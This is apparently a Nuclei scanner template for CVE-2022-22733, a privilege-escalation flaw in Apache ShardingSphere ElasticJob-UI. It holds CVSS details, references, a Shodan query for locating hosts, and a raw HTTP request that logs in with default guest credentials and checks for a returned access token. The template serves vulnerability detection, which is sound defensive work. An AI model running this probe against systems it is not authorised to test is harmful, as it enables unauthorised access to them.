id: CVE-2022-22733 info: name: Apache ShardingSphere ElasticJob-UI privilege escalation author: Zeyad Azima severity: medium description: | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions. remediation: | Apply the latest security patches or updates provided by Apache ShardingSphere to mitigate the privilege escalation vulnerability. reference: - https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation - https://nvd.nist.gov/vuln/detail/CVE-2022-22733 - https://lists.apache.org/thread/qpdsm936n9bhksb0rzn6bq1h7ord2nm6 - http://www.openwall.com/lists/oss-security/2022/01/20/2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2022-22733 cwe-id: CWE-200 epss-score: 0.17749 epss-percentile: 0.95623 cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: apache product: shardingsphere_elasticjob-ui shodan-query: http.favicon.hash:816588900 tags: cve,cve2023,exposure,sharingsphere,apache http: - raw: - | POST /api/login HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* Access-Token: Content-Type: application/json;charset=UTF-8 Origin: {{RootURL}} Referer: {{RootURL}} {"username":"guest","password":"guest"} matchers-condition: and matchers: - type: word part: body words: - '"success":true' - '"isGuest":true' - '"accessToken":' condition: and - type: word part: header words: - application/json - type: status status: - 200 # digest: 4a0a0047304502201db20ed64c24fbb7d53bbfbfc7c41a8a08c0e0ba1e9bacc26a7bfbf9b4404123022100db8355e69eca9189db7bf798dd1d648e98bbc1dba79d55681b4970abcf307dd4:922c64590222798bb761d5b6d8e72950